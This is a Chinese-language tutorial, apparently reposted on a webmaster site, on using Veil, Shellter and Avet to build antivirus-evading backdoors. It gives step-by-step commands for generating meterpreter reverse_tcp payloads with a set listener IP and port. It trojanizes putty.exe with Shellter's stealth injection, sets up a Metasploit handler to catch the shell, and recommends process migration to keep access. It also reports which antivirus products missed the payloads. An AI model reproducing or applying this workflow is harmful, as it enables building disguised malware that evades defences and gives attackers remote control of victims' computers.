简介三款免杀工具(含BLACKHAT最新工具)
在当今基本每台电脑都配备有杀毒软件的情况下,普通的木马后门已经不能满足我们的渗透测试需要。这就催生出了免杀技术(Anti Anti-Virus)来绕过杀毒软件的防御来进一步控制感染目标。而在
在当今基本每台电脑都配备有杀毒软件的情况下,普通的木马后门已经不能满足我们的渗透测试需要。这就催生出了免杀技术(Anti Anti-Virus)来绕过杀毒软件的防御来进一步控制感染目标。而在免杀与杀毒软件的斗争中,免杀的方法技术也在一步一步改进创新,正所谓道高一尺魔高一丈。常见的免杀手段有特征码修改、内存免杀和对文件的免杀。下面我就为大家介绍几款我常用的免杀工具。 一、Veil Veil是一种可以生成带有Metasploit载荷的后门工具,可以绕过部分杀软的防御,软件本身一直在更新。 安装: git clone cd Veil-Evasion/ cd setup setup.sh–c 安装完之后,切换到Veil-Evasion目录下使用python Veil-Evasion.py打开这个工具。 然后我们可以使用list命令来看一下都有哪些模块,我这里就不再演示。这里我用c/meterpreter/rev_tcp做演示。 Usec/meterpreter/rev_tcp //使用这个模块 Options //显示选项 Set LHOST 192.168.62.171 //设置监听机 Set LPORT 4444 //设置监听端口 Run //生成免杀后门 当出现下图所示的信息时,证明已经生成完毕。 然后我们就可以去/usr/share/veil-output/compiled/这个目录查看生成的木马。软免杀效果如图所示,只有360和江民报毒了。 然后我们可以打开msfconsole useexploit/multi/handler setpayload windows/meterpreter/reverse_tcp 然后设置和刚才载荷一样的参数进行监听,我把后门放到物理机上打开,如图所示已经返回了shell,接下来为所欲为。 二、Shellter Shellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。 安装:apt-get update&&apt-get install shellter 安装完毕后输入shellter打开工具 这里选择Auto,A,然后输入需要注入的exe文件路径 这里我选择使用一个putty作为注入的exe。 然后就自动生成,这里可以看到一些生成的信息。 这里选择是否使用隐蔽模式,选择Yes 这里选择payload,我选择L后选择1的payload 设置监听机ip和端口 生成完毕。这时我们可以把原来的那个putty.exe文件移到物理机上试验一下,同时打开msfconsole的监听。 当在物理机上打开putty后,已经弹回了shell,为所欲为。但是注意要及时迁移注入到其他进程中,如果不迁移,putty一旦被关闭,连接也会断开。国内杀毒软 件检测结果如下图。 三、Avet 安装:1.用WINE安装TDM-GCC,默认配置安装这里不再详细说明 2.git clone 安装完毕后,找到自己想要生成的后门载荷,切到/avet/build/目录下打开相应的.sh文件对LHOST和LPORT进行修改。 然后再用切换到/avet目录执行./build/相应的载荷木马免杀工具,如下图。 生成完的.exe文件就在avet文件夹内,默认名称为pwn.exe。 打开msf监听返回shell。 这款工具是目前免杀效果最好的,免杀效果如下图 更多的关于这个工具的用法,这个工具的github里有很多例子,大家可以去看一下。 你会喜欢 (编辑:海南站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |